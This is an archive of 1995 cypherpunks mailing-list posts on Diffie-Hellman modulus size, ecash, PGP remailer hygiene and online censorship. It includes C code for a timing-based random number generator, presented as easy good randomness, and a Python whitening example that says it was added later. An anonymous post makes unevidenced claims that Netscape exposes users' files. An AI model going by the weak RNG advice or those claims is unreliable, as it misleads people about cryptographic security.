MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hilarie Orman <ho@cs.arizona.edu> wrote:

>>  Well, since we already require 56-bit DES in ESP in the interests of
>>  promoting basic interoperability, wouldn't a 512-bit prime be
>>  similarly sufficient?
>
>If you are willing to accept that in all likelihood, one year from
>now, some group will announce that can "crack" all key exchanges that
>using the published modulus, then sure, call it sufficient.

Sounds like someone just threw down a gauntlet.

Is it even possible to do the precomputations in a distributed manner in
less than a year or two?  Or maybe starting a few years down the road?
It would be nice to give Photuris a chance to get established before the
least common denoninator shared modulus gets taken out, if we even can
take it out.


Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKDVvfobez3wRbTBAQHpkgP9Fg+MGMz8U6Bisv45PZohoZxWbiEYuxJK
tg8oHD8TZRQsuqCwveWFRTnmPGiGKs2cBs5ZKXkFNU6ot7lZLO8d/1BSSjo0yX2Q
0FSXDSaBjUKIFcjHHGYBWrZZ+gjc/bdab94EqQvmFSUmAp73/mnKZgcyUPGL3Cmt
MW3jZhlVMdw=
=bfsQ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Thu, 9 Nov 1995 08:28:22 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To: <acbf8a88070210047acb@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951108145313.367A-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 Nov 1995, Timothy C. May wrote:

> At 2:48 PM 11/3/95, Ray Arachelian wrote
> >Now does anyone want my old 1st edition? :-)
> 
> I am interested. I will trade five (5) slightly used prime numbers for it.
> 
> (Has anybody ever thought about using prime numbers as a medium of barter
> in a digital economy? Think of the labor that would be saved if we all
> didn't have to compute our own!! :-})

Sure, why not.  As soon as someone offers something I'd like to get, for 
which they would like the five even more slightly used primes. :-)  But 
seriously, it'll be cool to trade for the book and get something useful 
I'd want anyway...  If not I'll probably chuck it to the public library 
with a post it note that says Anonymous Donation. :-)

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Nov 1995 08:23:57 +0800
To: cypherpunks@toad.com
Subject: Return of the Cyber-Censors
Message-ID: <199511082002.PAA13786@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, November 8, 1995.


   Return of the Cyber-Censors [Editorial]

   When the Senate passed its ill-advised "Exon amendment" to
   the telecommunications bill last spring, which would
   criminalize the transmission of obscene, pornographic or
   "indecent" material on the Internet, the measure got an
   overwhelming 84 votes, many of them from senators who
   didn't understand the implications of the move. Only a few
   weeks later, the House went even more overwhelmingly the
   other way, voting 420 to 4 for an amendment (co-sponsored
   by Reps. Ron Wyden and Christopher Cox) that would bar the
   Federal Communications Commission from regulating
   cyberspace and would instead make it legally easier for
   commercial Internet providers to use their own technical
   tools to regulate questionable material.

   The contrast was the result of a burst of public discussion
   in which more technologically astute members, including
   House Speaker Newt Gingrich, caught on to the disturbing
   fact that the kinds of far-reaching liability imposed by
   Sen. James Exon's formulation -- hastily adapted from an
   existing measure on telephone transmission -- would cripple
   practically any commercial Internet provider and
   effectively lame the new medium as a venue for moneymaking
   activity.

   Now these vastly different measures are in conference
   committee along with the rest of the telecommunications
   bill (in other areas of which, we remind readers once
   again, The Washington Post Co. has some interests). But the
   seeming clarity afforded by the House response to the Exon
   amendment and by Mr. Gingrich's appreciation of the need
   for untrammeled development of the new medium is nowhere to
   be seen. A letter from Christian Coalition head Ralph Reed,
   Phyllis Schlafly and other prominent spokesmen for the
   religious right is urging the conferees toward an
   Exon-style approach that's as destructive now as it ever
   was. The House bill also could end up including an
   amendment sponsored by Rep. Henry Hyde that adds some
   criminal liability to the transmission of obscene (but not
   "indecent") images via the new technologies.

   The argument against "criminalizing" the transmission of
   "indecent" images via the Internet remains stark and
   simple, and it goes not to the awfulness of child
   pornography or even to the ability of parents to control
   what their children do on the computer (a wide variety of
   off-the-shelf technological filters now exist that let
   parents do this themselves) but to the impossibility of
   regulation by the electronic middleman industries that are
   developing.

   Commercial providers such as America Online continue to
   pass along millions of messages a day, the interactive
   "newsgroups" unfold quickly and internationally, and the
   kind of central filtering envisioned by would-be regulators
   erases the very quality that makes the Internet a live and
   promising medium -- its inexpensive accessibility. If the
   Internet were like a telephone system, there would at least
   be the possibility of identifying a specific "sender" and
   "recipient." On the Internet it's "receivers" who do the
   selecting of what to look at and where. Giving those
   recipients the tools they need remains the way to go. The
   conferees should resist the urge to censor cyberspace.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 9 Nov 1995 09:13:43 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <199511082306.PAA24448@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Nov 1995, Perry E. Metzger wrote:

> anonymous-remailer@shell.portal.com writes:
> > I wish that Detweiler could (seriously) go back to wherever he came from. 
> 
> What a fascinating statement to make, considering that you are
> probably Detweiler.

Fascinating.  

First, I'm accused of being noted computer viral expert, 
Dr. Frederick B.  Cohen, (simply because he agrees with my assessment of
the critical algorithm flaw in Netscape Navigator) and now I'm accused of
perhaps being at the other end of the spectrum.  Of being Detweiler,
simply because he can take my signature and identity by signing an email,
as Alice de 'nonymous or simply accusing me of posting in his "style". 

I see that the character assassination sport continues, and I am now
targeted.  Hunter become hunted.  I wonder why??  And why, by of all
people, Perry?  Is it perhaps because, I speak the truth, and the truth
makes people very, very nervous.  Is it because the flaw which is in the
Navigator product is woven into the code fabric, and can't be *fixed*. 

After all, Netscape (and AT&T) have had, over THREE WEEKS to work on this
problem or to make some form of public comment, and have done nothing, but
put some of their programmers -- unofficially ... speaking for myself ...
not speaking for the Company -- programmers on this list

Meanwhile people are having their PGP keyrings collected, their passwords
monitored, and all of the information -- even information which they have
NOT posted to Usenet, information that is simply on their personal hard
drives, or on a private corporate network that is behind a firewall --
collected by anyone who actually understands *how* to use Netscape
Navigator's standard features to do it. 

And so the question is: Why am I having my character assassinated while
this threat continues??  And while the loss and damage continues.  Why
are Netscape and AT&T not mitigating the damage?

Is it because what I say is simple common sense stripped of the veneer of
"technical language" and jargon??  And can't be *commented* on or *fixed*. 

Is this the fear which any truth teller faces, not only on the Internet,
but in any forum where they try to challenge Goliath. 

Maybe, that's one reason to post anonymously.

To clear the record definitively, I am neither Detweiler nor Dr.
Frederick B. Cohen, and I am not the issue.  I am simply myself, and I
will _reveal_ my identity to the international public once the timing
is appropriate.

If anyone wants to know who I am, they can contact the PR department
of AT&T or Netscape and ask.

(Their address can be requested from either postmaster@att.com or 
postmaster@netscape.com, respectively.)

Both companies have an email address for me, and would _likely_ *cough*
forward any email enquiries to me without any editing.  That way,
everything is done clearly and out in the open.  Nothing hidden, and
nothing private, and none of my comments will become "their sole property
to be used in their sole discretion". 

Neither company can accuse me of attacking them with daggers in the
dark of night, from behind a shield of anonymity, when I advocate
public open disclosure and commentary.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 08:11:49 +0800
To: Richard.Johnson@colorado.edu (Richard Johnson)
Subject: Re: Photuris 512bit Prime Challenge? (Re: Photuris Primality verification needed)
In-Reply-To: <v02130501acc6820ddefd@[204.144.184.50]>
Message-ID: <199511082020.PAA09434@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Richard Johnson writes:
> Hilarie Orman <ho@cs.arizona.edu> wrote:
> >If you are willing to accept that in all likelihood, one year from
> >now, some group will announce that they can "crack" all key exchanges
> >using the published modulus, then sure, call it sufficient.
> 
> Sounds like someone just threw down a gauntlet.
> 
> Is it even possible to do the precomputations in a distributed manner in
> less than a year or two?

I would guess that it probably is. However, there is no point in
trying to do this yet since I suspect that Phil and Bill can be
convinced that it's a bad idea to specify a 512 bit modulus.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 9 Nov 1995 09:35:07 +0800
To: cypherpunks@toad.com
Subject: ecash speed
Message-ID: <199511082345.PAA02628@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


A few days ago I got my ecash account set up with the Mark Twain bank.
Presently only one merchant is officially listed at <URL:
http://www.marktwain.com/shops.html>, Delorie Software.  As I understand
it, only people with merchant accounts are eligible to be listed here.
However, you don't have to have a merchant account to receive ecash or to
set up shop software.  If anyone else has set up a shop to receive Mark
Twain ecash using a user account, perhaps they could post here and we
could keep a list of unofficial vendors.

The other thing I wanted to write about is ecash speed.  One idea people
have had is to use ecash for micropayments, such as one cent to read a
web page.  The question is, is the current ecash software sufficiently
fast for this?  Maybe someone could set up a site using either Twain ecash
or DigiCash ecash which actually charged you a penny for each page you
browsed around.  It would be interesting to see how much of an obstacle
it presents in browsing the web.  The impression I've had from the few
times I've used ecash is that in fact it does slow things down way too
much for this to be practical.  But it would be good to actually do the
experiment.

One reason I was thinking about this is reading a new paper by Rivest and
Shamir, <URL:http://theory.lcs.mit.edu/~rivest/RivestShamir-mpay.ps>.  It
is about a couple of proposed systems for micropayments, specifically
oriented towards the penny-per-web-page model.  They are offline systems,
designed so that a minimum of calculation is done by the vendor, user and
bank.  So they should be very efficient.

However, the big problem is that they are not anonymous.  The cash
tokens are recognizable by the bank when spent tokens are sent in by
the vendors - the bank knows who spent them.  Maybe for penny level
transactions that is not a big deal, although if for-pay web browsing
becomes common then it does seem like it would present a privacy
threat.  Every web site you visit (not the specific pages, but the
overall site names) would be known by the bank - quite a significant
piece of marketing data.

The point is that if the anonymity afforded by ecash is too costly in
terms of time, then we may end up stuck with a non-anonymous system
simply because that is the only one efficient enough to work.  It would
be good to find out if that is a serious problem.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kevin S. Van Horn" <vanhorn@hks.net>
Date: Thu, 9 Nov 1995 08:23:00 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again--a URL for Usenet Searching
Message-ID: <199511082054.PAA07132@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tcmay@got.net (Timothy C. May) wrote:
>
>Paul Robichaux pointed me to another searcher, http://www.excite.com/,
>which _does_ index the alt groups. I'm sure more are coming, reaching
>further and further back in time.

A small point of information.  I work for Architext, the company that provides
the excite service.  We only keep the last two weeks of USENET news around,
and don't keep any archives going further back than that.  USENET is just too
damn huge for us to go to the trouble of keeping comprehensive archives around
without good evidence of demand for it among our target audience.

- ------------------------------------------------------------------------------
Kevin S. Van Horn | Uncle Sam needs YOU!
vanhorn@atext.com | But not vice versa.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMKEY8ioZzwIn1bdtAQFFEgGA1e12AazfexoLEvlrQDWFGPqFOXafAgBZ
NxKKd+nWATgsUQhwI7jQ0P8pTQ9XvI1k
=7sgB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Thu, 9 Nov 1995 09:52:24 +0800
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511081943.LAA24863@kiwi.cs.berkeley.edu>
Message-ID: <Pine.3.89.9511081605.A20339-0100000@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


I think you are fine if the odds of corrupting the message are less than 
the odds of getting hit by a falling meteor while running the program.
In general there is little point in making any one part of the system 
many orders of magnitude more reliable than any other part.

	-Lance


On Wed, 8 Nov 1995, Raph Levien wrote:

>    Point well taken.
> 
>    I'm seriously considering completely disabling the PGP comment
> feature when invoked from premail. In fact, that's what the new code
> does right now.
> 
>    On an unrelated topic... cypherpunks like to count bits, right?
> What is the correct number of pseudorandom bits to use in a MIME
> multipart separator? If the data has a line which matches the
> separator, the message is corrupted. Of course, if you can take
> multiple passes through the data, you can simply verify that it does
> not contain a line which matches the separator. But if you're
> restricted to a single pass, then the only way to do it is to use a
> randomly generated separator.
>    I figure that 128 bits should _definitely_ be enough (that's what
> is in the new premail code now). Even 64 bits should ensure that it is
> unlikely that anyone will ever experience message corruption over the
> expected lifetime of premail. However, it makes me nervous. What do
> people think?
> 
> Raph
> 

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Fri, 10 Nov 1995 08:13:42 +0800
To: <mcip@deepeddy.com>
Subject: European Online Development list
Message-ID: <v03003b01acc6f3c3d676@[129.46.82.88]>
MIME-Version: 1.0
Content-Type: text/plain


[In case this interests any of you. -dave]

................................. cut here .................................

>Date: Wed, 8 Nov 1995 19:28:25 +0100
>From: steve@isys.hu (Steven Carlson)
>Subject: invitation to join the European Online Development list
>
>Greetings -
>
>I'm writing to invite you to join the European Online Development list
><online-europe>. If you're active or interested in Internet in Europe or
>the CIS, this list may be for you.
>
>I'm inviting you because you're one of my circle of contacts, and work
>either in journalism or in an Internet-related field. I'm sending a
>similar letter out to several hundred people who attended Esther Dyson's
>East-West High-Tech Forum, held recently in Bled, Slovenia.
>
>A day before this year's conference opened, Esther held a special meeting
>of Internet providers and related companies from around Europe and the
>CIS. We all agreed it was a very useful meeting, that we should meet again
>soon, and that we should all try to keep in contact over the net.
>Therefore this list.
>
>As commercial Internet pioneers in Europe, we find ourselves in surprising
>agreement on a number of topics. Though many of us now earn our daily
>bread from providing Internet connectivity, many of us suspect the real
>future may be in content. Yet what form this new medium will take - or who
>will pay how much for what - still remains a mystery.
>
>We share concerns about privacy, copyright, encryption, censorship and
>libel. In each of our countries, these and other issues will eventually
>need to be addressed by new laws, laws that will be written by people who
>- we suspect - know very little about online realities.
>
>In each of our countries, the local PTT is waking up to the smell of
>profits in the IP market. These telecoms much prefer a comfortable
>monopoly to the vagaries of competition. The PTTs have considerable
>financial resources and political connections. How can smaller Internet
>providers compete with these giants on even terms? Who will guarantee a
>level playing field?
>
>I think you'll agree there's plenty to talk about. And at this early stage
>in the development of Internet that's exactly what we need to do.
>
>I hope this list becomes a useful resource: a place to learn what others
>are doing in Europe and the CIS; a place to identify potential partners; a
>place to watch and learn.
>
>To subscribe, send a message with no subject line, and the text: subscribe
>online-europe, to <majordomo@isys.hu>. Contact me if you need help
><steve@isys.hu>.
>
>Once you subscribe, you might want to send a message to the list
>introducing yourself and your company. Give us some idea of what problems
>you're working with in the field of Internet media or connectivity. Or, if
>you like, share with us your success stories.
>
>Send your posts to <online-europe@isys.hu>
>
>A full WWW archive of online-europe is available at
><http://www.isys.hu/online-europe>. Don't get too excited yet. At present
>all you'll find there are some test messages.
>
>Thanks for your attention, look forward to seeing you on the list.
>
>=steve=
>
>---
>Steven Carlson
>iSYS Hungary info@isys.hu
>steve@isys.hu http://www.isys.hu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 9 Nov 1995 09:56:45 +0800
To: cypherpunks@toad.com
Subject: Re: PGP Comment feature weakens remailer security
Message-ID: <199511090020.QAA12479@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Nov 1995, Raph Levien wrote:

>    On an unrelated topic... cypherpunks like to count bits, right?

Mmmm, sometimes we do ... <g>

Sometimes we even think, if I were a lil wa'bbit, where would I go hide
... especially when we do a bad Elmer Fudd impression of Bugs Bunny. <p>

> What is the correct number of pseudorandom bits to use in a MIME
> multipart separator? If the data has a line which matches the
> separator, the message is corrupted.  Of course, if you can take
> multiple passes through the data, you can simply verify that it does
> not contain a line which matches the separator. But if you're
> restricted to a single pass, then the only way to do it is to use a
> randomly generated separator.

An interesting problem.  

If you are going to take multiple passes, and do top-down and bottom up
analysis, then you can't really parse on the fly. It pretty much has to be
a batch job, I think.  You have to get your data, and then check it.  You
can't simply *trust* that there is not any corruption, and pass all of
your data through. 

And if you're going to parse in a single pass, then we're back to the 
problem of monkeys sitting at typewriters and Shakespeare's sonnets.

>    I figure that 128 bits should _definitely_ be enough (that's what
> is in the new premail code now). Even 64 bits should ensure that it is
> unlikely that anyone will ever experience message corruption over the
> expected lifetime of premail. However, it makes me nervous. What do
> people think?

Unfortunately, it's not quite that simple.  

The likelihood of corruption is not based on each past run.  It's just
like rolling dice.  The odds of rolling boxcars are 1 in 36 (I think) no
matter how many prior times you've rolled boxcars.

Twenty passes doesn't influence whether you crap out or not on a single
roll.  Nothing *remembers* past performance to ensure that something
doesn't happen (or happens) many, many times in a row.  I guess, this is
why Atlantic City, Baden Baden, and Las Vegas generally do as well as they
do. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 9 Nov 1995 10:16:55 +0800
To: cypherpunks@toad.com
Subject: "Industry Group Rebuffs U.S. on Encryption" (NYT 8Nov95, C3)
Message-ID: <9511090050.AA01828@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


A group of 37 companies and trade and privacy associations sent a
letter to Al Gore yesterday, complaining about Clipper-II and crypto
export controls, and promising to send their own policy proposals
to Congress and the Administration within six months.

It's a short story.  I'll leave the exact text to John Young :-).
I've heard that there's a better story in the Washington Post today, too.
I expect we'll see the letter itself within a day or two.

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@catfish.lcs.mit.edu>
Date: Thu, 9 Nov 1995 08:43:27 +0800
To: cypherpunks@toad.com
Subject: Re: PGP Comment feature weakens remailer security
Message-ID: <199511082151.QAA05650@catfish.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 bill.stewart> So, for safety, either turn off PGP comments before
 bill.stewart> using it with remailers, or wipe out the comments by
 bill.stewart> hand before each layer of encryption (easy to do with
 bill.stewart> GUI-based systems like Private Idaho; I don't know if
 bill.stewart> premail lets you do this or not.)

Incidentally, Mailcrypt's remailer support strips the comment field
after each encryption, and has done so since version 3.2.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMKEmVHr7ES8bepftAQEPSgP9FJYeKUSZKyFN/VWIwLjKIaDVzPtzyqHR
tbj1UqbDl1trrKCoV6uud5qfK/FQwqQylnv1YsYNIVPPav66ImUvgSaXUMvZJBvC
8vinQI66s3M1PBJ8VIaLuVtay826JDazGHEexHpDLwNVGLdJq0RrNLVr2H9oLA8g
5aE9MHVfAcM=
=MdHQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Andrew Stevenson <frank@funcom.no>
Date: Thu, 9 Nov 1995 09:14:16 +0800
To: cypherpunks@toad.com
Subject: True Random (short c-source)
Message-ID: <Pine.SGI.3.91.951108165325.25592A-100000@odin>
MIME-Version: 1.0
Content-Type: text/plain


I have written a short random number generator which appears to produce
reasonable random numbers even in DOS, at the heart of the code is the
short function fGetRand, the amount of entropy derived from this
function varies from >1 to >>6 depending on system load, I haven't
made any effort to whiten it at all. I am not making any claims about
its usefulness. I am only trying to demonstrate the ease with which
good random numbers may be obtained. Any comments and analysis will be
mostly welcome, the source is hereby placed in the public domain:

I have used WATCOM10 to compile and test under DOS/WIN95, where
clock is running at 18hz. I have also tested on IRIX with impressive
results.

--- START ----
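#include <time.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */

int   fGetRand (void);

int main (void) {
   long vCount;
   FILE *out;
   int byte = 0;      /* accumulates 8 bits, most significant first */
   int tick;

   out=fopen("random.bin","wb");
   if(out==NULL) {
      printf("cant write to file random.bin\n");
      exit(1);
   }

   /* collect 512 bits: the low bit of each fGetRand() sample */
   for(vCount=1;vCount<=512;vCount++) {
      tick=fGetRand()&0x01;
      /* shift the new bit in; the mask keeps the int from overflowing */
      byte=(byte+byte+tick)&0xFF;
      /* every 8th bit, write the packed byte */
      if((vCount & 0x7)==0) fputc((char)byte,out);
      /* each raw bit is also written as a byte of its own */
      fputc((char)tick,out);
   }

   fclose(out);
   return 0;
}


/* Count loop iterations until clock() advances to its next value;
   the count depends on where within the tick the call started. */
int   fGetRand (void) {
   int count = 0;     /* must start at zero for the count to mean anything */
   clock_t tick;

   tick=clock();
   while(tick==clock()) count++;

   return (count);
}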
----- END -----

PGP encrypted mail preferred, finger for key.
The above views are ONLY endorsed by BoggleMind Inc. (not to be confused
with MindBoggle Ltd.)
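
The post above gives entropy figures for fGetRand and says no whitening is done. As an added example (not part of the original post), the Python below estimates the min-entropy of the low bit from a list of loop counts and applies von Neumann debiasing to it. The function names, the emulated 18.2 Hz tick and the sample counts are constructed for illustration.

```python
import math
import time
from collections import Counter


def get_count(hz=18.2):
    """Port of fGetRand: spin until an emulated coarse clock tick changes.

    Assumption: time.monotonic() quantized to `hz` ticks per second stands in
    for the coarse clock() the post was tested with.
    """
    tick = int(time.monotonic() * hz)
    count = 0
    while int(time.monotonic() * hz) == tick:
        count += 1
    return count


def low_bits(counts):
    """Keep only the least significant bit of each count, as main() does."""
    return [c & 1 for c in counts]


def min_entropy(symbols):
    """Plug-in min-entropy per symbol, in bits: -log2 of the most common
    symbol's observed frequency. A point estimate, no confidence margin."""
    if not symbols:
        raise ValueError("no samples")
    most_common = Counter(symbols).most_common(1)[0][1]
    return -math.log2(most_common / len(symbols))


def von_neumann(bits):
    """Debias a bit stream: read non-overlapping pairs, emit the first bit of
    each unequal pair, drop equal pairs. Removes bias from independent bits;
    it does not remove correlation between successive samples."""
    out = []
    for a, b in zip(bits[0::2], bits[1::2]):
        if a != b:
            out.append(a)
    return out


def pack_bits(bits):
    """Pack whole groups of 8 bits into bytes, most significant bit first
    (the same order as byte=byte+byte+tick); leftover bits are dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


# Constructed sample of loop counts with a biased low bit (12 odd, 4 even).
SAMPLE_COUNTS = [1041, 1043, 1040, 1045, 1047, 1042, 1049, 1051,
                 1053, 1044, 1055, 1057, 1059, 1061, 1046, 1063]

if __name__ == "__main__":
    raw = low_bits(SAMPLE_COUNTS)
    print("raw bits       :", raw, "min-entropy/bit = %.3f" % min_entropy(raw))
    print("after whitening:", von_neumann(raw))
    live = low_bits([get_count() for _ in range(64)])   # takes about 3.5 s
    print("live, whitened :", pack_bits(von_neumann(live)).hex())
```

The whitened stream is shorter than the raw one: with a 3:1 bias most pairs are equal and get dropped, which is the price of removing the bias.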






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Thu, 9 Nov 1995 10:42:47 +0800
To: beeson@aclu.org
Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995
Message-ID: <951108171518_82372328@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------
November 8, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies
at the state and federal level.
-----------------------------------------------------------------
IN THIS ISSUE:

*  ACLU Statement and ACTION ALERT on Federal Wiretap Bill

*  ACTION ALERT on Federal Online Indecency Legislation

*  State Utility Commissions Consider Online Access and Privacy Issues

*  News on Electronic Access to Public Information in Washington State

*  John Perry Barlow Launches Cyberspace Lecture Series Co-Sponsored by the
ACLU of Washington

*  ACLU Student Chapter President at Georgetown University Law Center Writes
About Marty Rimm Controversy

*  Conferences

*  Online Resources from the ACLU National Office and State Affiliates

-----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
-----------------------------------------------------------------
* ACLU Statement and ACTION ALERT on Federal Wiretap Bill

Last week, the ACLU emphatically urged the FBI to withdraw its proposal for
greatly increased wiretapping powers.  "Given the government's own statements
on the usefulness of wiretaps, we can only guess at the FBI's motives," said
Laura W. Murphy, Director of the ACLU's National Washington Office.  "But if
Congress were to allow this system to go into place, we'd have a national
surveillance apparatus that would pale in comparison to the infamous security
state of the former Soviet Union."

"This proposal," Murphy added, "would make the KGB look like privacy
advocates."

"The proposal would dramatically reduce the privacy rights in the United
States because it would -- no matter what the Justice Department says --
result in significant increase in the number of innocent third party
conversations intercepted by law enforcement officials," Murphy said.
 "Already too many innocent conversations -- nearly two million in the last
year alone -- are intercepted by federal and local law enforcement wiretaps."

According to the government's own statistics, 1,800 innocent conversations
are intercepted each and every time a wiretap or other form of electronic
surveillance is placed.

Just last week, the ACLU joined with the National Rifle Association and a
broad coalition of other gun advocates and civil liberties organizations in
calling for Congress to institute a 24-point reform plan for federal law
enforcement.  In a letter to Congress, the groups said that the excesses of
Waco and Ruby Ridge demonstrate that Congress and the Administration must
begin to rein in the powers of federal police authorities.

[The 24-point reform plan and related documents are available on America
Online, at keyword ACLU, under "federal law enforcement reforms."  For an
e-mailed copy of the reform plan, send a message to infoaclu@aclu.org with
"fed law enforcement reform" in the subject line.]

URGENT ACTION NEEDED:

-Call the FBI at 202-252-7296 and urge it to withdraw the proposed
wiretapping system.  You can also find the phone number of the FBI's local
field offices at the FBI web site at http://www.fbi.gov.

-Call the Attorney General at 202-514-2001 and urge her to order the FBI to
withdraw its wiretapping proposal.

-Call your members of Congress and tell them to urge the Justice Department
and the FBI to withdraw the wiretap proposal.  Urge your representatives to
oppose any funding for this wiretap scheme.  You can reach the Capitol
Switchboard at 202-224-3121 for the Senate and 202-225-3121 for the House of
Representatives.

-Call Rep. Bob Barr (R-GA), a former federal prosecutor and leading opponent
of funding efforts for wiretap:

     Rep. Bob Barr
     U.S. House of Representatives
     1607 Longworth Building
     Washington, DC 20515
     (202) 225-2931

-Call your own telephone companies, both local and long distance, and urge
them to oppose the wiretap proposal and to stand up for the privacy rights of
their customers instead of becoming the snooping arm of a prying government.

-----------------------------------------------------------------
*  ACTION ALERT on Federal Online Indecency Legislation

The conference committee on the telecommunications bill will soon consider
whether to remove provisions that would make "indecency" a crime in
cyberspace.  On Monday, November 6, we distributed an action alert urging
individuals to call Congress to express opposition to any measures to censor
the Net.

THIS MAY BE YOUR LAST CHANCE TO STOP UNCONSTITUTIONAL RESTRICTIONS ON YOUR
RIGHT TO FREE SPEECH IN CYBERSPACE!!

[You can find the action alert on America Online, at keyword ACLU, under
"threats to civil liberties in cyberspace," or on the Internet at
http://www.vtw.org/]

In addition to the call to action for individual Net users, the ACLU and
People for the American Way obtained signatures from over 75 organizations to
a letter opposing the federal online indecency provisions.  The letter will
be sent to Senator Pressler and Representative Bliley on the conference
committee later this week.

[After 11/13, you can find a copy of the organizational letter on America
Online, at keyword ACLU, under "threats to civil liberties in cyberspace."
 To receive a copy of the letter via e-mail, send a message to
infoaclu@aclu.org with "organizations opposed to online censorship" in the
subject line.]

The ACLU continues to prepare for a constitutional challenge to the online
censorship provisions if they become law.  Please contact Ann Beeson,
beeson@aclu.org, if your organization is interested in being a plaintiff in
this ground-breaking litigation that will define First Amendment rights in
cyberspace.

-----------------------------------------------------------------
STATE PAGE (Legislation/Agency/Court Cases)
-----------------------------------------------------------------
*  State Utility Commissions Consider Online Access and Privacy Issues

Many state utilities commissions are considering issues that can affect your
online access and privacy rights, from approving caller ID to defining
universal access.  Online users are urged to stay informed and involved in
utilities commission decisions in their states that may affect cyberspace
rights.  Consumer Project on Technology has put up a list of information
about state utility commissions.  The list includes contact information for
all 50 state utility commissions, and also lists utility consumer advocates
in 40 states.

See http://www.essential.org/cpt/isdn/contacts.html

-----------------------------------------------------------------
*  News on Electronic Access to Public Information in Washington State

A Washington State task force has been examining the issue of electronic
access to information maintained by government agencies.  The ACLU of
Washington submitted comments commending the task force for requiring some
form of free electronic access, and limiting all fees to incremental costs.
 But the task force was criticized for not paying sufficient attention to
privacy, especially increased threats to privacy presented by accumulation of
information on individuals from diverse sources.  

Also in Washington State, King County Superior Court Judge George Finkle
ruled that Geographical Information System databases are public records and
must be made available to the public for nominal copying fees.  (GIS systems
are databases that contain information associated with a physical location,
such as the location of utility cables, public buildings, roads, demographic
information, zoning info, or traffic density.)  As in many locations around
the country, the City of Bellevue had attempted to charge far higher fees for
GIS databases, which were created for government use but also have commercial
value.  This ruling reaffirms the notion that public information should be
available to all, not just those with deep pockets.

-----------------------------------------------------------------
